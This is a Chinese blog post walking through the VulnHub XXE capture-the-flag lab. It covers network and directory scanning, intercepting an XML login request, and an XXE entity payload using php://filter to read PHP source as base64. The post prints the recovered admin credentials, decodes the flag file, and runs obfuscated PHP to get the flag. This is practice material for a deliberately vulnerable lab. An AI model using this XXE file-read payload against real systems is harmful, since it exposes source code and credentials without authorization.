vulnhub-xxe靶场(XXE漏洞最细攻略)

目录

一、准备靶场环境:

二、信息收集:

三、漏洞发现和利用

解码链接:

需要任何工具和软件私信我。         


一、准备靶场环境:

下载完压缩包(解压):

导入然后打开虚拟机

二、信息收集:

现在我们需要找到靶场地址,点击虚拟机,然后点击下方设置。看到虚拟机的网络模式为NAT

然后点开编辑中的虚拟网络编辑器,虚拟机NAT模式网段为192.168.222.X

因为靶场网络是随机分配的,我们需要用工具扫描

192.168.222.1 – 192.168.222.255 80端口

找到靶场IP地址为192.168.222.130

发现是默认apache2页面,用工具进行目录扫描:

发现两个目录,index.html是我们刚刚访问的界面,猜测robots.txt是源码泄露双击访问

三、漏洞发现和利用

发现网址后台,再访问:

因为是xxe靶场,于是猜测登录是用xml数据传输,使用随便账号密码bp抓取登录包内容:

发现是xml格式,之前有个admin.php,查看admin.php的源码:于是构造poc:

<!DOCTYPE a [<!ENTITY b SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php"> ]>

这里我们需要进行base64解码,解码得到账号和md5加密后的密码

if ($_POST['username'] == 'administhebest' &&

   md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609')

解码链接:

 md5解码链接:https://www.cmd5.com/default.aspx

base64解码链接:https://www.toolhelper.cn/EncodeDecode/Base64

密码解密出为admin@123  账号为administhebest

因为是在admin.php的源码里于是访问admin.php网址:

登陆成功,点击flag发现404错误,但是有新的文件名

于是我们再依靠上面的xxe漏洞查看flagmeout.php的源码:

解base64得

<?php

$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";

echo $flag;

?>

flag全是大写字母和数字,猜测是base32加密:

讲解码后的数据再base64解密发现路径:

发现路径,再次依靠上面的xxe漏洞读取源代码:

base64解码得

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_)

看不懂,但是 是flag.php里的内容,猜测是php代码,用自己的网站查看,在自己得WWW目录下创建.php文件把内容粘贴到里面,不要忘记加<?php ?>

最终得到xxe_is_so_easy。

需要任何工具和软件私信我。         

                                                                                                                                         Meet.meet

  • 19
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值